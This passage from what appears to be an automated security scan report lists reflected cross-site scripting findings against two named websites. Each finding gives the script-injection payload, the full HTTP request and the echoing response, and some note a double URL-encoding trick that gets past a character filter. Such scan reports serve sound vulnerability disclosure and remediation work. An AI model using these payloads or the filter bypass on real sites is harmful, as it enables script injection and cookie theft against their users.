<input type="hidden" name="redirect_to" value="/blog/wp-contenta9113\"><script>alert(1)</script>8e9a7fe5ccf/themes/fusion/style.css"/>
...[SNIP]...

4.394. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f8a"><script>alert(1)</script>2831b1c5c4c was submitted in the REST URL parameter 3. This input was echoed as 41f8a\"><script>alert(1)</script>2831b1c5c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes41f8a"><script>alert(1)</script>2831b1c5c4c/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:31 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes41f8a\"><script>alert(1)</script>2831b1c5c4c/fusion/style.css"/>
...[SNIP]...

4.395. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a60"><script>alert(1)</script>f2f57b9d531 was submitted in the REST URL parameter 4. This input was echoed as 62a60\"><script>alert(1)</script>f2f57b9d531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion62a60"><script>alert(1)</script>f2f57b9d531/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:01 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion62a60\"><script>alert(1)</script>f2f57b9d531/style.css"/>
...[SNIP]...

4.396. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e509"><script>alert(1)</script>6e1baafeaf7 was submitted in the REST URL parameter 5. This input was echoed as 4e509\"><script>alert(1)</script>6e1baafeaf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/style.css4e509"><script>alert(1)</script>6e1baafeaf7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:35 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/style.css4e509\"><script>alert(1)</script>6e1baafeaf7"/>
...[SNIP]...

4.397. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb4ce"><script>alert(1)</script>0e6703dee9d was submitted in the REST URL parameter 1. This input was echoed as bb4ce\"><script>alert(1)</script>0e6703dee9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogbb4ce"><script>alert(1)</script>0e6703dee9d/wp-includes/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogbb4ce\"><script>alert(1)</script>0e6703dee9d/wp-includes/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.398. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26937"><script>alert(1)</script>623efd4c563 was submitted in the REST URL parameter 2. This input was echoed as 26937\"><script>alert(1)</script>623efd4c563 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes26937"><script>alert(1)</script>623efd4c563/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:29 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes26937\"><script>alert(1)</script>623efd4c563/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.399. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37aa"><script>alert(1)</script>bfdee75891b was submitted in the REST URL parameter 3. This input was echoed as e37aa\"><script>alert(1)</script>bfdee75891b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/jse37aa"><script>alert(1)</script>bfdee75891b/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:00 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/jse37aa\"><script>alert(1)</script>bfdee75891b/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.400. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf9dc"><script>alert(1)</script>2f7e1717085 was submitted in the REST URL parameter 4. This input was echoed as cf9dc\"><script>alert(1)</script>2f7e1717085 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquerycf9dc"><script>alert(1)</script>2f7e1717085/jquery.js?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:34 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/js/jquerycf9dc\"><script>alert(1)</script>2f7e1717085/jquery.js?ver=1.4.2"/>
...[SNIP]...

4.401. http://themehybrid.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33098"><script>alert(1)</script>334e90016a7 was submitted in the REST URL parameter 5. This input was echoed as 33098\"><script>alert(1)</script>334e90016a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquery/jquery.js33098"><script>alert(1)</script>334e90016a7?ver=1.4.2 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:09 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10402

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-includes/js/jquery/jquery.js33098\"><script>alert(1)</script>334e90016a7?ver=1.4.2"/>
...[SNIP]...

4.402. http://themehybrid.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3efee"><script>alert(1)</script>a6bb477d363 was submitted in the REST URL parameter 1. This input was echoed as 3efee\"><script>alert(1)</script>a6bb477d363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3efee"><script>alert(1)</script>a6bb477d363 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:35 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10332

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/favicon.ico3efee\"><script>alert(1)</script>a6bb477d363"/>
...[SNIP]...

4.403. http://themehybrid.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a9e"><script>alert(1)</script>3a4d3743f82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9a9e\"><script>alert(1)</script>3a4d3743f82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c9a9e"><script>alert(1)</script>3a4d3743f82=1 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:25 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10338

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/favicon.ico?c9a9e\"><script>alert(1)</script>3a4d3743f82=1"/>
...[SNIP]...

4.404. http://themehybrid.com/themes/shadow [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/themes/shadow

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724f1"><script>alert(1)</script>f58e6876aa was submitted in the REST URL parameter 2. This input was echoed as 724f1\"><script>alert(1)</script>f58e6876aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/shadow724f1"><script>alert(1)</script>f58e6876aa HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Date: Mon, 24 Jan 2011 23:08:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f6177b1b9eecf87361d317653896a6cd; path=/
Last-Modified: Mon, 24 Jan 2011 23:09:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10332

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/themes/shadow724f1\"><script>alert(1)</script>f58e6876aa"/>
...[SNIP]...

4.405. http://themehybrid.com/themes/shadow [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/themes/shadow

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43780"><script>alert(1)</script>ea07d5a6863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43780\"><script>alert(1)</script>ea07d5a6863 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/shadow?43780"><script>alert(1)</script>ea07d5a6863=1 HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:06:23 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=a629d306e11ea7b3eb0918077b4324c2; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11504

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/themes/shadow?43780\"><script>alert(1)</script>ea07d5a6863=1"/>
...[SNIP]...

4.406. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61900%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3ec98366db was submitted in the REST URL parameter 1. This input was echoed as 61900"><script>alert(1)</script>b3ec98366db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /61900%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3ec98366db/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=eb5a53dd9393fea7e28a18ad42ff6222; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/61900"><script>alert(1)</script>b3ec98366db/joomla/1-joomla-16-je-tu" />
...[SNIP]...

4.407. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65783%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25b1f376489 was submitted in the REST URL parameter 2. This input was echoed as 65783"><script>alert(1)</script>25b1f376489 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /index.php/joomla65783%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25b1f376489/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:10 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=2f61d9afac2a2e2a40887fe127d09901; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
<base href="http://venedet.michnica.net/index.php/joomla65783"><script>alert(1)</script>25b1f376489/1-joomla-16-je-tu" />
...[SNIP]...

4.408. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

